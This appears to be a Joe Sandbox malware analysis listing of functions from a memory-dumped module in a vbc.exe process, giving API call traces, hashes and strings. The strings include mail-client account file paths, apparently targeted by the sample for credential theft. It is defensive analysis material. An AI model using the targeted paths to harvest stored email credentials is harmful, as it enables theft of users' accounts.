_free.LIBCMT ref: 100059EA

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100059F6
_free.LIBCMT ref: 10005A01
_free.LIBCMT ref: 10005A0C
_free.LIBCMT ref: 10005A17
_free.LIBCMT ref: 10005A22
_free.LIBCMT ref: 10005A2D
_free.LIBCMT ref: 10005A38
_free.LIBCMT ref: 10005A43
_free.LIBCMT ref: 10005A51

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84

Uniqueness

Uniqueness Score: -1.00%

Function 10001CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: File$Delete$CloseCopyCreateHandleReadSize
String ID:
API String ID: 1454806937-0
Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70

Uniqueness

Uniqueness Score: -1.00%

Function 10009492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
__fassign.LIBCMT ref: 1000954F
__fassign.LIBCMT ref: 1000956A
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10003370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 1000339B
___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
_ValidateLocalCookies.LIBCMT ref: 10003431
__IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
_ValidateLocalCookies.LIBCMT ref: 100034B1

Strings

csm, xrefs: 10003446

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 10009221: _free.LIBCMT ref: 1000924A

_free.LIBCMT ref: 100092AB

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100092B6
_free.LIBCMT ref: 100092C1
_free.LIBCMT ref: 10009315
_free.LIBCMT ref: 10009320
_free.LIBCMT ref: 1000932B
_free.LIBCMT ref: 10009336

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751

Uniqueness

Uniqueness Score: -1.00%

Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
__freea.LIBCMT ref: 10008A08

Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

__freea.LIBCMT ref: 10008A11
__freea.LIBCMT ref: 10008A36

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1

Uniqueness

Uniqueness Score: -1.00%

Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 10001607
_strcat.LIBCMT ref: 1000161D
lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
lstrcatW.KERNEL32(?,?), ref: 1000165A
lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
lstrcatW.KERNEL32(00001008,?), ref: 10001686

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: lstrcatlstrlen$_strcat_strlen
String ID:
API String ID: 1922816806-0
Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9

Uniqueness

Uniqueness Score: -1.00%

Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 10001038
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: lstrlen$AttributesFilelstrcat
String ID:
API String ID: 3594823470-0
Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300

Uniqueness

Uniqueness Score: -1.00%

Function 10005AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
_free.LIBCMT ref: 10005B2D
_free.LIBCMT ref: 10005B55
SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
_abort.LIBCMT ref: 10005B74

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
Opcode Fuzzy Hash: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174

Uniqueness

Uniqueness Score: -1.00%

Function 100011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3

GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A

Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869

Strings

\Accounts\Account.rec0, xrefs: 1000125A
\Mail\, xrefs: 1000126D
\Data\AccCfg\Accounts.tdat, xrefs: 1000120E
\Storage\, xrefs: 10001246

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: lstrlen$_strlenlstrcat$AttributesFile
String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
API String ID: 4036392271-1520055953
Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
Opcode Fuzzy Hash: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758

Uniqueness

Uniqueness Score: -1.00%

Function 10004B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F

Strings

mscoree.dll, xrefs: 10004B52
CorExitProcess, xrefs: 10004B64

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5

Uniqueness

Uniqueness Score: -1.00%

Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 1000715C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F

Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
_free.LIBCMT ref: 100071B8
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0

Uniqueness

Uniqueness Score: -1.00%

Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
_free.LIBCMT ref: 10005BB4
_free.LIBCMT ref: 10005BDB
SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164

Uniqueness

Uniqueness Score: -1.00%

Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
lstrcatW.KERNEL32(?,?), ref: 10001EAC
lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: lstrlen$lstrcat
String ID:
API String ID: 493641738-0
Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5

Uniqueness

Uniqueness Score: -1.00%

Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 100091D0

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100091E2
_free.LIBCMT ref: 100091F4
_free.LIBCMT ref: 10009206
_free.LIBCMT ref: 10009218

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64

Uniqueness

Uniqueness Score: -1.00%

Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1000536F

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 10005381
_free.LIBCMT ref: 10005394
_free.LIBCMT ref: 100053A5
_free.LIBCMT ref: 100053B6

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84

Uniqueness

Uniqueness Score: -1.00%

Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000104), ref: 10004C1D
_free.LIBCMT ref: 10004CE8
_free.LIBCMT ref: 10004CF2

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, xrefs: 10004C14, 10004C1B, 10004C4A, 10004C82

Memory Dump Source

Source File: 00000014.00000002.4018091500.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000014.00000002.4018015124.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.4018091500.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_10000000_vbc.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
API String ID: 2506810119-50795131
Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54

Uniqueness

Uniqueness Score: -1.00%

Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
__freea.LIBCMT ref: 100087D5

